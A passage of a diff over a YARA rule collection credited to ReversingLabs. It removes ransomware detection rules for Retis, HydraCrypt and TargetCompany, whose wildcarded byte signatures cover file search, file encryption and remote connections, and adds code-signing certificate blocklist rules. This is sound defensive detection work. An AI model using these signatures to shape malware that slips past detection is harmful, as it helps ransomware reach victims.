?? 8B 4D ?? 52 83 - EF ?? 57 8D 46 ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? F6 06 ?? 74 ?? 50 E8 ?? ?? ?? - ?? 8B 56 ?? 8B 45 ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C3 ?? 83 C6 ?? 3B 5C 24 ?? 0F - 82 ?? ?? ?? ?? 8B 74 24 ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($enum_network_resources) and ( all of ($find_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures[i].serial=="03:23:cc:4e:38:73:5b:0e:6e:fb:a7:6e:a2:5c:73:b7" and 1512000000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Retis : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE { meta: - description = "Yara rule that detects Retis ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3d1de7c2-abb7-5411-a598-6bc68229a22a" - date = "2021-08-12" - modified = "2021-08-12" + id = "b78e3bc2-5b65-507a-9183-148f97baa3e8" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Retis.yara#L1-L74" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3e3429041acc5730b009916efbcd35c7cfd2b2877dc1d2cf980f7fb7d399d532" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14278-L14294" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d7c9a471455768a00deeb73900bf80a98f0b2c9da1fd09d568e2998deaf404d2" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Retis" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_files = { - 00 00 04 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C 00 08 28 ?? ?? ?? ?? - 0A 72 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ?? - ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 06 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? - ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? - 12 ?? 28 ?? ?? ?? ?? 13 07 00 11 ?? 73 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 16 FE - ?? 13 ?? 11 ?? 2C ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? - 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? - ?? 00 00 2B ?? 00 1F ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? - ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 12 ?? - 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE - ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? - 6F ?? ?? ?? ?? 00 DC 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 DC 2A - } - $search_drives = { - 00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 - 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 00 00 09 17 58 0D 09 08 8E 69 32 ?? 07 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 26 00 07 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? - 13 ?? 00 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? - 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? - ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? - 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? - 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F - ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE ?? - ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? - ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 12 ?? - 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 - DC 2A - } - $encrypt_files = { - 00 03 19 17 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 0B 06 07 - 16 07 8E 69 6F ?? ?? ?? ?? 26 06 6F ?? ?? ?? ?? 00 03 18 18 73 ?? ?? ?? ?? - 0C 73 ?? ?? ?? ?? 0D 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 00 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? - ?? ?? 00 09 6F ?? ?? ?? ?? 13 ?? 08 11 ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 07 - 16 07 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 - 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A - } - condition: - uint16(0)==0x5A4D and ($search_files and $search_drives and $encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="1f:9a:ca:06:9a:c1:b6:bf:b0:e1:48:61:ec:85:7b:f6" and 1477440000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Hydracrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE { meta: - description = "Yara rule that detects HydraCrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2e780f7c-8d6d-51c8-b65e-330cc3b17bb7" - date = "2020-07-15" - modified = "2020-07-15" + id = "3ad650b2-45ea-5324-b8dc-b48094ae2376" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.HydraCrypt.yara#L1-L174" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "910a6f23f06cecb8d3115ebfed42a66412dbd0d3a519e39f21df81b0c2028f48" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14296-L14312" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d8f70ba61509f3df34705bea0bfcb4cce3e92a33f0f1b65315d886eb5592f152" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HydraCrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_1 = { - 55 8B EC 83 EC ?? 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 BE ?? ?? ?? ?? 56 - 33 DB 53 53 6A ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? - 59 59 53 53 6A ?? 53 53 6A ?? FF 75 ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 56 53 53 68 ?? ?? ?? ?? FF 75 ?? 68 - ?? ?? ?? ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? - E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ?? FF D0 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? - ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? - BF ?? ?? ?? ?? 57 89 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 56 50 57 FF 75 ?? E8 ?? ?? ?? ?? - 83 C4 ?? 5F 39 5D ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 39 5D ?? 74 ?? FF 75 ?? E8 ?? - ?? ?? ?? 59 39 5D ?? 5E 5B 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 C9 C3 - } - $remote_connection_2 = { - 55 8B EC 83 EC ?? 53 56 57 6A ?? 59 68 ?? ?? ?? ?? 33 DB BE ?? ?? ?? ?? 8D 7D ?? 6A - ?? 89 5D ?? F3 A5 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 53 8D 4D ?? 51 FF D0 8B - F8 3B FB 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 68 - ?? ?? ?? ?? 53 53 FF 75 ?? 57 FF D0 8B F0 3B F3 75 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 68 - ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? - E8 ?? ?? ?? ?? 59 59 8D 4D ?? 51 6A ?? 8D 4D ?? 51 56 FF D0 39 5D ?? 75 ?? 57 E8 ?? - ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 40 EB ?? 68 ?? ?? - ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 4D ?? 51 FF D0 33 C9 3B C8 1B C0 - F7 D8 5F 5E 5B C9 C3 - } - $remote_connection_3 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D - 45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 56 53 FF D0 56 - 50 89 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? - ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF D0 BF ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ?? - ?? 59 59 85 DB 7E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 8B C3 6A ?? 99 59 - F7 F9 85 D2 75 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ?? - E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B 45 ?? 0F B6 04 03 - 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? - ?? ?? ?? 83 C4 ?? 43 3B DE 7C ?? E8 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 50 56 8D 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 83 C4 ?? 83 7D ?? ?? BB ?? ?? ?? ?? BE ?? ?? ?? - ?? 75 ?? 53 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? - 75 ?? 53 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F - 5E 5B C9 C3 - } - $encrypt_files_1 = { - 8A 45 ?? 04 ?? 66 98 66 89 45 ?? 0F B7 C0 50 8D 45 ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68 - ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 FF D0 8B F0 83 FE ?? 74 ?? 83 - FE ?? 74 ?? 83 FE ?? 75 ?? FF 75 ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 57 6A ?? E8 ?? ?? ?? - ?? 59 59 68 ?? ?? ?? ?? FF D0 FF 45 ?? 83 7D ?? ?? 0F 8C ?? ?? ?? ?? 83 3D ?? ?? ?? - ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE - ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 - ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? - 75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 56 6A - ?? E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85 ?? ?? ?? ?? 50 - 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 - C4 ?? 6A ?? 53 53 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 53 FF D0 57 6A ?? E8 ?? ?? ?? - ?? 59 59 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 5F - 5E 33 C0 5B C9 C2 - } - $encrypt_files_2 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D - 45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 89 - 45 ?? 8D 45 ?? 50 66 A5 E8 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 66 A5 BE - ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 53 89 45 ?? 8D 45 ?? 53 50 66 A5 E8 ?? ?? ?? ?? 59 50 - E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 E8 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 BF ?? - ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 55 ?? 68 ?? - ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ?? - 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 FF D0 8B F0 53 56 E8 ?? ?? ?? ?? 59 - 59 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF - D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF - } - $encrypt_files_3 = { - D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? - ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? BE ?? ?? ?? - ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? FF D0 56 E8 ?? ?? - ?? ?? 59 3C ?? 75 ?? BE ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D0 - E8 ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF - D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF - D0 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? - ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 68 ?? ?? ?? ?? 57 8D 85 ?? ?? - ?? ?? 50 BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 57 8D 85 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 - C4 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 68 ?? ?? ?? - ?? 6A ?? 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 6A ?? FF 75 ?? A3 ?? ?? ?? ?? FF 55 - ?? 6A ?? FF 75 ?? 8B F0 FF 55 ?? FF 75 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? 50 FF - } - $encrypt_files_4 = { - 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 85 C0 75 ?? 33 C0 40 E9 ?? ?? ?? ?? 8B 3D - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8B C8 8B 45 ?? 53 57 99 53 53 - 2B C2 68 ?? ?? ?? ?? D1 F8 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B C6 99 2B C2 D1 F8 2D - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 53 FF D1 A3 ?? ?? ?? ?? E8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 51 FF D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 - BE ?? ?? ?? ?? 85 C0 75 ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53 - 53 FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53 53 FF D0 39 1D ?? - ?? ?? ?? 75 ?? 6A ?? 58 EB ?? 6A ?? 59 33 C0 68 ?? ?? ?? ?? 89 5D ?? 8D 7D ?? 6A ?? - F3 AB E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 EB ?? 83 F8 ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? E8 - ?? ?? ?? ?? 59 59 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8D 4D - ?? 51 FF D0 6A ?? 59 8D 75 ?? BF ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? - ?? 59 59 53 53 53 8D 4D ?? 51 FF D0 3B C3 75 ?? 8B 45 ?? 5F 5E 5B C9 C2 ?? ?? 6A ?? - E9 - } - $remote_connection_4 = { - 55 8B EC 51 51 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 33 F6 56 56 56 6A ?? - 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 8B D8 E8 ?? ?? ?? ?? 59 59 56 56 6A ?? 56 - 56 6A ?? FF 75 ?? 53 FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 68 - ?? ?? ?? ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF D0 68 ?? ?? ?? - ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 56 56 56 FF 75 ?? FF D0 53 E8 ?? ?? ?? ?? - FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B C9 C3 - } - $remote_connection_5 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 FF 68 ?? ?? ?? ?? 47 57 E8 ?? ?? ?? ?? 59 59 - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? BE ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 - FF D0 56 57 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 56 57 E8 - ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8 - ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 BE ?? ?? ?? ?? 85 C0 74 ?? 56 57 - E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 57 - 6A ?? FF D0 8B D8 85 DB 7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ?? - 51 FF D0 6A ?? 58 66 89 45 ?? 8B 46 ?? 8B 00 8B 00 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 66 - 89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 8D ?? ?? ?? ?? 51 FF D0 6A ?? 50 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 53 E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? FF D0 5F 5E 5B C9 C3 - } - condition: - uint16(0)==0x5A4D and (($encrypt_files_1 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3) or ($encrypt_files_2 and $encrypt_files_3 and $encrypt_files_4 and $remote_connection_4 and $remote_connection_5)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dong Qian" and pe.signatures[i].serial=="3e:9d:26:dc:f7:03:ca:3b:14:0d:7e:7a:d4:83:12:e2" and 1440580240<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Targetcompany : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE { meta: - description = "Yara rule that detects TargetCompany ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7e6983f9-2aca-5cfa-aad6-38aa64fa2062" - date = "2021-09-27" - modified = "2021-09-27" + id = "be5e6f35-6177-50bb-82ea-55628acda4c2" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.TargetCompany.yara#L1-L141" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "05fa81afa8aa1e3b9955ad24a274ddef4fb32d678902af7aae6d6c67ed3bf0fd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14314-L14330" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e89f722345fda82fd894d34169d1463997ae1d567d46badbf3138faa04cf8fa4" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = 